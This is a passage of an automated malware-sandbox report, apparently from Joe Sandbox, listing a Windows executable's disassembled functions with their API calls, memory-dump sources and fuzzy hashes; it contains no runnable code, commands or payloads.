                                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                    Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                    Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                                    Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                                    Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                                                                    • __freeptd.LIBCMT ref: 0041516B
                                                                                                                                                    • ExitThread.KERNEL32 ref: 00415173
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1454798553-0
                                                                                                                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                                                                    Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strncmp
                                                                                                                                                    • String ID: Q\E
                                                                                                                                                    • API String ID: 909875538-2189900498
                                                                                                                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                                                                                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                                                                                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                                                                                                                    Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove_strncmp
                                                                                                                                                    • String ID: U$\
                                                                                                                                                    • API String ID: 2666721431-100911408
                                                                                                                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                                                                                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                                                                                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                                                                                                                    Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                                    • String ID: LPT
                                                                                                                                                    • API String ID: 3035604524-1350329615
                                                                                                                                                    • Opcode ID: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                                                                                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                                                                                                                    • Opcode Fuzzy Hash: 3d5f434a59475b58f50c217a871fcdbd2ab5cc1753bb95236303f7f2d86bf337
                                                                                                                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                                                                                                                    Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \$h
                                                                                                                                                    • API String ID: 4104443479-677774858
                                                                                                                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                                                                                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                                                                                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                                                                                                                    Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                    • String ID: &
                                                                                                                                                    • API String ID: 2931989736-1010288
                                                                                                                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                                                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                                                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                                                                                    Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                                                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                                                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                                                                                    Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00466825
                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                                    • String ID: |
                                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                                                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                                                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                                                                                    Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: '
                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                                                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                                                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                                                                                    Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _strlen.LIBCMT ref: 0040F858
                                                                                                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                                                                                    • _sprintf.LIBCMT ref: 0040F9AE
